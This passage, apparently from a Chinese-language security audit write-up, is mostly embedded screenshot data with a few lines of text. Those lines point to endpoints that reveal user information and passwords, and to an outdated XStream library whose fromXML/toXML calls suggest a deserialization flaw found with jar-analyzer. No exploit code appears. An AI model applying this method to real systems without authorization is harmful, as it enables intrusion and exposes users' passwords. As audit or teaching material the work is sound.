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
|
|||
|
|
<p blockindex=56>比如<code>queryUser</code>可以查看用户信息</p>
|
|||
|
|
<p blockindex=57><img src="data:image/png;base64,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
|
|||
|
|
<p blockindex=58><code>viewUser</code>可以查看对应用户的密码</p>
|
|||
|
|
<p blockindex=59><img src="data:image/png;base64,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
|
|||
|
|
<p blockindex=60>另外在lib中看到低版本的xstream依赖</p>
|
|||
|
|
<p blockindex=61><img src="data:image/png;base64,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" alt=image-20240315103111739 referrerpolicy=no-referrer layer-index=19></p>
|
|||
|
|
<p blockindex=62>xstream主要是在调用fromXML和toXML方法如果传入参数可控就大概率存在反序列化漏洞</p>
|
|||
|
|
<p blockindex=63>利用jar-analyzer工具快速找出项目中调用相关方法的位置</p>
|
|||
|
|
<p blockindex=64><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAwwAAAJsCAIAAADfnrPCAAAgAElEQVR4nOy9fWwbV5bge678EXkmIdOd9MjuGG8iUeQTnqDY3HYYUOmgsRiRa1JGj7RDof942M2yM0P2ituiqPUaYM8o6bQXS8DPQ4nqpTZkI80NFg94DyJGmjxJ9JBaPARISwjbHjr2aKBHirKn0R1Hk6Q7LHsSjRz7vj9uVbFIFotFfX+c31/krftx7q1bdU+de6oO4TgOEARBEARBEAAAeP311//0T/+0sbGxYbclQRAEQRAE2Vs8fvz48ePHqCQhCIIgCIKUgEoSgiAIgiCIDJRSVJIQBEEQBEHKefz4MaUUlSQEQRAEQZAS0JKEIAiCIMi+58svv9zAIWUopQfKkkTpzbddb9+kdLcFQRAEQRBkh/jyyy9ffPHF999/v/LQ+++//+KLL25MT9qW7TZ6823XT2bvbVRTofTe7E9crrdvbq1Um+fm2+VS3Zv9Cespvfm22+12u90u109m722k45TefNvl+snsvR0ohSAIgiAHiRMnTrz11luvvvpqmZ70/vvvv/rqq2+99daJEyc2UO2etCR9nLkOp09/cGOvGYTOfOslkEhF6b3M9V+/9F3bSfjw5++e+vFbb0UikUj/c1Nv/HwDkn+ceDdNiPr8TJV0u2/AS/U2hSAIgiAHjW9/+9vvvPOOVE9iGtI777zz7W9/e2N17kUl6ePMdTj3Z9996YMbH+62KGUwLUmU6uPM9V+/9K0zQMjZ1163n2IqzplvvQS/+ejj+iqm92Z/dv3cH5vqUK0IOWV/PRqNvvat+ppCEARBkIOJVE/avIYkcnRLhJOF3pu9/MbUbwgBANO/f+u1s4TSe4nLb9z7bj+Mj39wuufNYdspiQWF0nuZ63Duz06e+eZL4+8m7Gdspwih9ObP3e+e6nnur/86DQDP/fGPX7efkq1crGT28o+vn3uTz3bzbfe7p/7Duevhv/5NsSHTv4++dpbSmz93jzMTDqtWQTxCzn7rJRi/8eFrZ88CryN992yZ+efDGx/Ac/0n6xkiei/xs6nnvhv55o2pYkqpDCc/Tsj2tKIq+YFCEARBkO1Do9EoHN3J0GeingQAW6IhwfYpSZTeS8zCn0UipwihN992j//8W5HvnwEAgA/Gb/RHIq9VbjB9ODsF5948CXDyWy+Nv5v52HaKX+V/PXXvu9HIa/Te7OU3fjZrHLad/Lha5YScsn33pal3M/dsJ08R8uGND176buSFs/aIHUDQmd78/hlepXgzEjnFq25vf5Ovopp4Z+w9p9+4cfP7Z87wOtKZkv7em708/sFL/ZFyzUmRD3/+xvVzb75+lty8UZIuyiA7jNWbKB8o+6k6hEEQBEGQejnYEWC3S0ki5JT9tVP3Zn/i5k04JvHQS/3yy/yHNz44fe7NU4QAnGVakp3Xkk732M8AAJw0njt9XblyAIAzvI518uTNGx+89K3v88n03uzlceiP2E4RQm/eSJPfwI9/8NeCvM999DGcURIPThrPnZ668eH3zzSV60j3Zn/yxhT0vBmpVEpEexWlz/W8WaK10Jtvj/+m583vy5ieRBlq9LSc8oFCEARBkEOCuMsGAHt0u+3jj34Dz33rFCFsOwx63oxETtF7s5ffqPESFqU3b3wAvyE/dvNqC6F09qbt+2dkMytWTshZe8+7P8t8bIR3P3jpu8wmROnNn79x/dybw6ICRJ/748r9PgUJCTnFtCT7qZK9tptvu8ahPxo9W6XU2dei0ddk+nsv8e4H5DdE0NMIwI9d1//4x39RUk+9w4ggCIIgh5AyPyS277Z5PWkrlST2ztfpc00AAKv3fn26503bSWAePPBcjcIf3vgAXup/i7e